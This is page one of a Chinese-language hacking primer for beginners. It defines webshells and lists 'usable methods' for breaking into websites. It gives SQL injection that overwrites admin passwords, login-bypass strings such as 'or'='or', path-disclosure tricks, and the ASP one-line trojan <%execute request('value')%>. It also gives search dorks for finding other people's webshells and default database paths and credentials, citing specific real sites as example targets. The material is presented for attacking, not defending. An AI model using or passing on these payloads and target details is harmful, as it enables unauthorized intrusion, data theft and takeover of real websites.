非常不错的脚本入侵基础知识总结第1/2页
一.Webshell是什么?这是很多朋友在疑惑的问题,
什么是webshell?今天我们就讲讲这个话题!
webshell是web入侵的脚本攻击工具。
简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。</P>
为了更好理解webshell我们学习两个概念:
什么是“木马”?“木马”全称是“特洛伊木马(Trojan<BR>Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载 (Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535 扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
webshell的优点
webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。
如何寻找webshel:
1,脚本攻击SQL注入<BR>
2,使用注入工具<BR>
3,在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持&"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.<BR>其他的东西,暂时不多说了,以后再深入吧,每天准备一个话题,需要的是巨大的毅力和努力,我们举办的每日讲座就是为了通俗容易懂的普及信息安全知识,让不喜欢看文章,觉得信息安全知识很深奥枯燥的人都明白,其实他只要花很少时间,就可以了解很多信息安全知识!
二.菜鸟学习入侵的14种可利用方法
作者:佚名 文章来源:本站原创 点击数:560 更新时间:2006-8-9
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]
3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
4.暴库:把二级目录中间的/换成%5c
EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
如果你能看到:'E:\test\test\database\test.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社会工程学。这个我们都知道吧。就是猜解。
7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.
EY:http://www.scbzlx.com/book/book.asp[这个就是ASP格式的数据库],再写入一句话木马
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
当前1/2页 12下一页阅读全文